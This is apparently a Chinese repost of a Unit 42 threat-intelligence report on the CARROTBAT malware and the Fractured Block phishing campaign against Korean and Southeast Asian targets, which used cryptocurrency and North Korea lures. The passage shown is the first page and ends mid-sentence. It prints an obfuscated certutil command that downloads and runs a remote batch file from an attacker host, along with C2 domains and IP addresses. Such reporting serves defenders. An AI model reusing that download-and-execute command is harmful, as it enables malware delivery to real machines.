安全黑客
当前位置:安全黑客文章资讯安全资讯安全新闻
日期:2018-12-06 00:08:00  来源:本站整理

CARROTBAT家族针对东南亚地区发起攻击[安全新闻]

赞助商链接



  本文“CARROTBAT家族针对东南亚地区发起攻击[安全新闻]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

Unit 42近期发现了一项针对与韩国和朝鲜地区进行的钓鱼活动,钓鱼内容围绕一系列主题展开,主要包括:加密货币,加密货币交易和政治事件。根据被投递的恶意载荷中所包含的有关信息,Unit 42将这个恶意软件家族命名为了CARROTBAT。
CARROTBAT家族的样本最早在2017年12月的一次攻击中被发现的,此次攻击是针对英国政府机构展开的,主要利用了SYSCON家族恶意软件,尽管没有明确证据表明CARROTBAT在攻击中被使用,但是研究人员还是通过攻击设备的行为重叠来确认出了CARROTBAT家族,并发现了它与SYSCON家族系列软件的联系。而此次攻击事件的主角SYSCON是一款简单的远程访问木马(RAT),它使用文件传输协议(FTP)进行网络通信,具体报道见于https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/。
迄今为止,一共识别出了29种不同的CARROTBAT样本,其中包含12种已确认的不同诱饵文件。这些样本于今年3月开始出现,在过去的3个月内进行了大量的活动。与先前投递的SYSCON家族恶意软件不同,新的攻击活动投递了OceanSalt(https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf)家族恶意软件。我们将CARROTBAT及其投递的相关载荷合并称之为Fractured Block。
 
攻击过程
2017年12月13日,yuri.sidorav@yandex[.]ru向英国政府机构内的高级人员发送了一封鱼叉钓鱼邮件。此电子邮件的主题是“我们会在没有先决条件的情况下与朝鲜对话”,此邮件的附件文件也使用了同样的命名方式。
在附件Word中显示了如下内容:
美国将“无条件地”与朝鲜对话
文章主要讨论了美国与朝鲜之间的外交关系,并且引用了NKNews[.]org当天发布的文章(文章链接为:https://www.nknews.org/2017/12/u-s-would-talk-with-north-korea-without-precondition-tillerson/ )。被引用的文章内容为:

附件文档利用DDE漏洞(漏洞介绍:https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)执行了以下代码:
https://researchcenter.paloaltonetworks.com/2018/11/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
DDE漏洞首次在2017年5月被利用于恶意攻击。攻击样本中包含下载名为0_31.doc的远程可执行文件的命令,文件被下载后以AAA.exe的文件名形式命名,并放在在受害者的%TEMP%目录中。被划定到SYSCON家族的恶意载荷通过FTP服务器与ftp.bytehost31[.]org via这个恶意服务器进行连接,以接收远程控制命令。

通过对恶意样本中的域名881.000webhostapp[.]com进行关联,又关联出了一批样本,其中包括KONNI恶意软件系列样本和4个CARROTBAT恶意软件系列样本(64位可执行文件)。根据特征进行筛选,最终筛选出了29个不同样本。
 
Fractured Block攻击
迄今为止,所有的CARROTBAT样本都是包含在Fractured Block攻击里的。CARROTBAT用于投递载荷来帮助攻击者投递并打开一个嵌入式诱饵文件,然后执行一个命令,该命令将在目标机器上下载并运行一个有效负载。此恶意软件支持以下11种诱饵文档文件格式:
.doc
.docx
.eml
.hwp
.jpg
.pdf
.png
.ppt
.pptx
.xls
.xlsx
在打开嵌入式诱饵文档后,会在系统上执行以下混淆命令:
C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt && ren 1.txt 1.bat && 1.bat && exit
此命令将尝试通过Microsoft Windows内置的certutil实用程序下载并执行远程文件。
通过对根据行为判别所找到的29个样本的编译时间戳进行研究,发现它们均在2018年3月到2018年9月之间,其中的11个被用于了实际的攻击过程。样本的编译时间戳如下图所示:

针对韩国受害者的大多数诱饵文件都有与加密货币的主题相关。在其中的一个案例中,诱饵文件包含了在COINVIL工作的个人名片,该组织宣布计划于2018年5月在菲律宾建立加密货币交易所。其他诱饵主题包括时事政治事件,如美国和朝鲜之间的关系,以及美国总统唐纳德特朗普访问新加坡峰会。CARROTBAT所投递的恶意载荷各不相同,在2018年3月到2018年7月期间,可以观察到所投递的多个SYSCON恶意样本,这些样本通过FTP与以下主机进行C2通信:
ftp.byethost7[.]com
ftp.byethost10[.]com
files.000webhost[.]com
从2018年6月开始,我们观察到CARROTBAT开始投递OceanSalt恶意软件。在撰写本文时,这些样本仍处于活动状态,并与61.14.210[.]72:7117进行C2通信。
 
与其他威胁活动的关联
CARROTBAT和KONNI恶意软件之间存在一些服务器重叠。KONNI是一种远程访问木马,已经活跃了四年之久,具有广泛的功能,通常利用000webhost等免费网络托管服务提供商的服务器作为其C2地址。在撰写本文时,这个特定的恶意软件系列尚未被归类为一个家族,但是该软件的攻击目标一直集中在东南亚地区。
上文反复提到的另一种关联是SYSCON恶意软件。这个恶意软件首次在2017年10月被报道,并且已经观察到了攻击中提供了与朝鲜有关的诱饵文件。此款恶意软件通常比较简单,利用远程FTP服务器

[1] [2] [3]  下一页


  以上是“CARROTBAT家族针对东南亚地区发起攻击[安全新闻]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • CARROTBAT家族针对东南亚地区发起攻击
  • T-Mobile的BlackBerry上的Carrier IQ的部署,
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .